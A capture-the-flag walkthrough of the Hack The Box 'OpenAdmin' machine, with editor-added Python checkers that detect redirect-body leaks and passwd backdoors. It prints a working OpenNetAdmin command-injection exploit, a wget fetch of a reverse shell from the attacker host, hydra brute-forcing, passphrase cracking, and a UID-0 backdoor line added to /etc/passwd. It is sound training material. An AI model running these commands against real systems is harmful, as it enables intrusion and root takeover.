| Machine Name | Difficulty | OS | Logo |
|---|---|---|---|
| OpenAdmin - HTB | Easy | Linux | |
Walkthrough
Let's start with an Nmap scan (full port range, with service and OS detection).
[*] Scan: 9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 21:59 EDT
Nmap scan report for 10.10.10.171
Host is up (0.25s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/17%OT=22%CT=1%CU=40349%PV=Y%DS=2%DC=T%G=Y%TM=60F38EB
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%TS=A)OPS(O1=M54BST11NW7%O2=M54BST11NW7%O
OS:3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54BNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 120.51 ms 10.10.16.1
2 326.87 ms 10.10.10.171
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 960.96 seconds
Based on that, I launched nikto and gobuster scans against port 80 (only the gobuster run is shown below).
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# gobuster dir --url http://10.10.10.171/ --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,html,bak,sql,txt,zip,rar,7z,conf,php5,sh,bash,cap,pcap -t 50 -w /usr/share/wordlists/dirb/big.txt --no-error | tee gobuster1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.171/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: sql,bash,pcap,rar,conf,sh,php,txt,zip,7z,html,bak,php5,cap
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2021/07/17 19:59:23 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.171/.htaccess.sql (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.sql (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.bash (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.sh (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd/ (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.php5 (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.html (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.php (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.html (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.rar (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.php5 (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.cap (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.cap (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.bak (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.rar (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.pcap (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.conf (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.php (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.bak (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.txt (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess/ (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.zip (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.7z (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.7z (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.pcap (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.sh (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.txt (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.bash (Status: 403) [Size: 277]
http://10.10.10.171/.htaccess.zip (Status: 403) [Size: 277]
http://10.10.10.171/.htpasswd.conf (Status: 403) [Size: 277]
http://10.10.10.171/artwork/ (Status: 200) [Size: 14461]
http://10.10.10.171/icons/ (Status: 403) [Size: 277]
http://10.10.10.171/index.html (Status: 200) [Size: 10918]
http://10.10.10.171/music/ (Status: 200) [Size: 12554]
http://10.10.10.171/server-status/ (Status: 403) [Size: 277]
http://10.10.10.171/sierra/ (Status: 200) [Size: 43029]
While the gobuster scans were running, I saw that an application was linked from http://10.10.10.171/music/ and that its version string was visible (OpenNetAdmin, served under /ona/). I searched for exploits for it with searchsploit.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# searchsploit opennetadmin
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# cp $(locate php/webapps/47691.sh) .
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# cat 47691.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";whoami;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
www-data
Great, we have RCE. The directory the commands run in (the OpenNetAdmin web root) was writable by www-data, so I pulled a PHP reverse shell into it over HTTP from my machine.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";wget http://10.10.16.56:1111/reverse4kuday.php;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";ls -al;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/ | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
total 132
drwxrwxr-x 10 www-data www-data 4096 Jul 18 00:33 .
drwxr-x--- 7 www-data www-data 4096 Nov 21 2019 ..
-rw-rw-r-- 1 www-data www-data 1970 Jan 3 2018 .htaccess.example
-rw-r--r-- 1 www-data www-data 12288 Jul 17 20:08 .reverse.php.swp
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 config
-rw-rw-r-- 1 www-data www-data 1949 Jan 3 2018 config_dnld.php
-rw-rw-r-- 1 www-data www-data 4160 Jan 3 2018 dcm.php
-rwxr-xr-x 1 www-data www-data 5494 Jul 17 19:43 diohan.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 images
drwxrwxr-x 9 www-data www-data 4096 Jan 3 2018 include
-rw-rw-r-- 1 www-data www-data 1999 Jan 3 2018 index.php
-rw-r--r-- 1 www-data www-data 0 Jul 18 00:31 kuday
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 local
-rw-rw-r-- 1 www-data www-data 4526 Jan 3 2018 login.php
-rw-rw-r-- 1 www-data www-data 1106 Jan 3 2018 logout.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 modules
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 plugins
-rw-r--r-- 1 www-data www-data 1111 Jul 17 08:46 reverse.php
-rw-r--r-- 1 www-data www-data 5493 Jul 18 00:19 reverse4kuday.php
-rw-r--r-- 1 www-data www-data 5495 Jul 17 20:02 rshell.php
-rw-r--r-- 1 www-data www-data 76 Jul 17 19:57 shell.php
-rw-r--r-- 1 www-data www-data 73 Jul 17 19:40 shell.php.1
-rw-r--r-- 1 www-data www-data 76 Jul 17 19:57 shell.php.2
-rw-r--r-- 1 www-data www-data 5493 Jul 17 18:18 supaShell.php
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 winc
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 workspace_plugins
When I triggered the reverse shell from the browser, a shell landed on my listener.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.171: inverse host lookup failed: Unknown host
connect to [10.10.16.56] from (UNKNOWN) [10.10.10.171] 43070
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
00:34:10 up 1 day, 3:10, 0 users, load average: 3.43, 4.79, 3.99
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.171 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:3463 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:3463 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:34:63 txqueuelen 1000 (Ethernet)
RX packets 2797350 bytes 376270029 (376.2 MB)
RX errors 0 dropped 863 overruns 0 frame 0
TX packets 2762041 bytes 949913630 (949.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 277881 bytes 20887608 (20.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 277881 bytes 20887608 (20.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
While browsing around inside I found the database configuration file, with the MySQL credentials in cleartext.
$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>
I had been brute-forcing SSH with hydra; I stopped that attack and instead had hydra try the password from the config against the users on the box. That identified a valid login: the database password was reused for jimmy's SSH account.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# hydra -L users -P passwords ssh://10.10.10.171
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-17 21:02:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 2 tasks per 1 server, overall 2 tasks, 2 login tries (l:2/p:1), ~1 try per task
[DATA] attacking ssh://10.10.10.171:22/
[22][ssh] host: 10.10.10.171 login: jimmy password: n1nj4W4rri0R!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-17 21:02:55
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jul 18 01:13:37 UTC 2021
System load: 0.82 Processes: 244
Usage of /: 53.4% of 7.81GB Users logged in: 0
Memory usage: 49% IP address for ens160: 10.10.10.171
Swap usage: 0%
=> There are 6 zombie processes.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jul 17 20:42:12 2021 from 10.10.14.131
jimmy@openadmin:~$
While enumerating inside, I noticed something interesting.
---
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:52846 0.0.0.0:*
3306 was MySQL, but I had no idea what 52846 was. I worked out that it was a web service and guessed it was serving the code in the internal directory under /var/www.
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwxrwx 2 jimmy internal 4096 Nov 23 2019 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
-rwxrwxrwx 1 jimmy internal 3229 Nov 22 2019 index.php
-rwxrwxrwx 1 jimmy internal 185 Nov 23 2019 logout.php
-rwxrwxrwx 1 jimmy internal 339 Nov 23 2019 main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
As you can see, main.php prints joanna's SSH private key to the page. The session check above it only sends a Location header and never calls exit, so PHP keeps executing for an unauthenticated request and the key is returned in the body of the redirect. Fetching it with curl (which does not follow redirects by default) from localhost worked on the first try.
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D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-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
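The bug class here is "redirect without exit": the 302 is sent, but the rest of the script still runs and its output ends up in the response body, where any client that does not follow the redirect can read it. The fix in main.php is `header("Location: /index.php"); exit;`. The following editor-added checker (not code from the box or from the original post) looks at the problem from the testing side: it parses a raw HTTP response and flags a 3xx whose body is more than a bare stub or contains sensitive-looking markers. Both responses it is run against are constructed for the example, not captured from the machine.

```python
"""Flag 3xx responses that still carry a body (editor-added example).

Not code from the box or the original post. main.php sends
header("Location: /index.php") when $_SESSION['username'] is unset but never
exits, so the private key is written into the body of the 302. This checker
reports such redirects. LEAKY_RESPONSE / FIXED_RESPONSE are constructed.
"""
from typing import Dict, List, Tuple

SENSITIVE_MARKERS = ("-----BEGIN", "PRIVATE KEY", "<pre>")  # PEM blobs; main.php's output wrapper
STUB_LIMIT = 512  # a plain "Moved" page from Apache/PHP is well under this


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(maxsplit=2)[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def redirect_body_findings(raw: bytes) -> List[str]:
    """Human-readable findings; an empty list means the redirect is clean."""
    status, headers, body = parse_response(raw)
    if not 300 <= status < 400:
        return []
    findings: List[str] = []
    location = headers.get("location", "?")
    if len(body) > STUB_LIMIT:
        findings.append(f"{status} -> {location}: body is {len(body)} bytes, not a stub")
    text = body.decode("utf-8", "replace")
    for marker in SENSITIVE_MARKERS:
        if marker in text:
            findings.append(f"{status} -> {location}: body contains {marker!r}")
    return findings


# Constructed: what the vulnerable main.php answers to an unauthenticated GET.
LEAKY_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /index.php\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"<pre>-----BEGIN RSA PRIVATE KEY-----\n"
    b"Proc-Type: 4,ENCRYPTED\n"
    b"DEK-Info: AES-128-CBC,00000000000000000000000000000000\n"
    b"(key material elided in this constructed sample)\n"
    b"-----END RSA PRIVATE KEY-----\n"
    b"</pre><html>\n<h3>Don't forget your \"ninja\" password</h3>\n</html>\n"
)
# Constructed: the same endpoint after adding exit; after header().
FIXED_RESPONSE = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: /index.php\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for name, raw in (("leaky", LEAKY_RESPONSE), ("fixed", FIXED_RESPONSE)):
        print(name, redirect_body_findings(raw) or ["clean"])
```

The marker list is deliberately narrow; when scanning a real application, the size check is what catches the general case, since a correct redirect has no reason to carry more than a one-line stub.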
However, the key was protected with a passphrase. I converted it with ssh2john and john cracked it quickly against rockyou (the "ninja" hint in main.php fits the result).
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# /usr/share/john/ssh2john.py id
id:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$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
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# /usr/share/john/ssh2john.py id > ssh2john
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# john ssh2john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:04 DONE (2021-07-17 22:02) 0.2475g/s 3549Kp/s 3549Kc/s 3549KC/sa6_123..*7¡Vamos!
Session completed
Now we can connect as joanna with the key and the cracked passphrase.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# ssh joanna@10.10.10.171 -i id
Enter passphrase for key 'id':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Jul 18 02:15:39 UTC 2021
System load: 1.35 Processes: 238
Usage of /: 53.4% of 7.81GB Users logged in: 1
Memory usage: 49% IP address for ens160: 10.10.10.171
Swap usage: 0%
=> There are 6 zombie processes.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jul 17 21:21:40 2021 from 10.10.14.131
joanna@openadmin:~$
Now we'll do something interesting. But first, let's grab the flag.
joanna@openadmin:~$ alias ls="ls -al"
joanna@openadmin:~$ ls
total 44
drwxr-x--- 6 joanna joanna 4096 Jul 17 23:47 .
drwxr-xr-x 4 root root 4096 Nov 22 2019 ..
lrwxrwxrwx 1 joanna joanna 9 Nov 22 2019 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 2019 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 2019 .bashrc
drwx------ 2 joanna joanna 4096 Nov 22 2019 .cache
drwx------ 3 joanna joanna 4096 Nov 22 2019 .gnupg
drwxrwxr-x 3 joanna joanna 4096 Nov 22 2019 .local
-rw------- 1 joanna joanna 170 Jul 17 23:47 nano.save
-rw-r--r-- 1 joanna joanna 807 Nov 22 2019 .profile
drwx------ 2 joanna joanna 4096 Nov 23 2019 .ssh
-rw-rw-r-- 1 joanna joanna 33 Nov 28 2019 user.txt
joanna@openadmin:~$ cat user.txt
c9**********************************
As shown below, the user is allowed to run nano as root without a password, restricted (on paper) to /opt/priv.
joanna@openadmin:/home$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
I escalated privileges like this: I opened /opt/priv with nano as root, then, from inside nano, used Read File (Ctrl+R) to open /etc/passwd, appended the line below to it and saved. The sudo rule only constrains the file name on the command line; once the editor runs as root it can read and write any file (and nano can also spawn a root shell from the Read File prompt with Ctrl+X, Execute Command).
joanna@openadmin:~$ sudo /bin/nano /opt/priv
joanna@openadmin:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
user:$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms/:0:0:root:/root:/bin/bash
To generate the password field (an md5crypt hash) I used openssl.
┌──(root💀kali)-[~/oscp/htb/OpenAdmin]
└─# openssl passwd -1
Password:
Verifying - Password:
$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms/
joanna@openadmin:~$ su user
Password:
root@openadmin:/home/joanna# id
uid=0(root) gid=0(root) groups=0(root)
root@openadmin:/home/joanna# cd /root
root@openadmin:~# ls
root.txt
root@openadmin:~# cat root.txt
2f9******************************
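The backdoor used for root above leaves a very recognisable trace: a second UID-0 account, with its hash stored in /etc/passwd instead of /etc/shadow. The following editor-added auditor (not part of the original walkthrough) parses passwd-format text and reports exactly that, plus the related things a defender or a post-engagement cleanup would look for: non-root accounts in GID 0, empty password fields, hashes in /etc/passwd with the scheme guessed from the prefix, and malformed lines. `SAMPLE_PASSWD` is constructed from the listing above plus a few clean entries.

```python
"""Audit /etc/passwd for the kind of backdoor added above (editor-added example).

Not part of the original walkthrough. On a modern system the second field of
every passwd line is "x" (hash lives in /etc/shadow); the escalation above
appends a line with UID 0 and an md5crypt hash (from `openssl passwd -1`)
stored directly in /etc/passwd. SAMPLE_PASSWD is constructed.
"""
from dataclasses import dataclass
from typing import List, Tuple

HASH_PREFIXES = {
    "$1$": "md5crypt", "$2": "bcrypt", "$5$": "sha256crypt",
    "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt",
}
SHADOW_MARKERS = {"x", "*", "!", "!!"}  # "look in shadow" or locked account


@dataclass
class PasswdEntry:
    name: str
    pw: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> Tuple[List[PasswdEntry], List[str]]:
    """Parse passwd lines; returns (entries, problems with unparseable lines)."""
    entries: List[PasswdEntry] = []
    problems: List[str] = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            problems.append(f"line {n}: {len(parts)} fields instead of 7")
            continue
        try:
            uid, gid = int(parts[2]), int(parts[3])
        except ValueError:
            problems.append(f"line {n}: non-numeric uid/gid")
            continue
        entries.append(PasswdEntry(parts[0], parts[1], uid, gid, *parts[4:]))
    return entries, problems


def hash_scheme(pw: str) -> str:
    """Guess the crypt(3) scheme from the modular-crypt prefix."""
    for prefix, name in HASH_PREFIXES.items():
        if pw.startswith(prefix):
            return name
    return "descrypt/unknown"


def audit_passwd(entries: List[PasswdEntry]) -> List[str]:
    findings: List[str] = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account that is not root (shell {e.shell})")
        elif e.gid == 0 and e.name != "root":
            findings.append(f"{e.name}: primary group is GID 0")
        if e.pw == "":
            findings.append(f"{e.name}: empty password field (no password required)")
        elif e.pw not in SHADOW_MARKERS:
            findings.append(f"{e.name}: hash stored in /etc/passwd ({hash_scheme(e.pw)})")
    return findings


# Constructed from the listing above (the hash is the one shown there).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
user:$1$7yTPISQ2$9DsJQreWfPBc7ZqTPHDms/:0:0:root:/root:/bin/bash
"""

if __name__ == "__main__":
    import sys

    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    entries, problems = parse_passwd(text)
    for item in problems + audit_passwd(entries):
        print(item)
```

Run it against `/etc/passwd` on the box after the escalation and it prints the two findings for the `user` line; on a clean Ubuntu install it prints nothing.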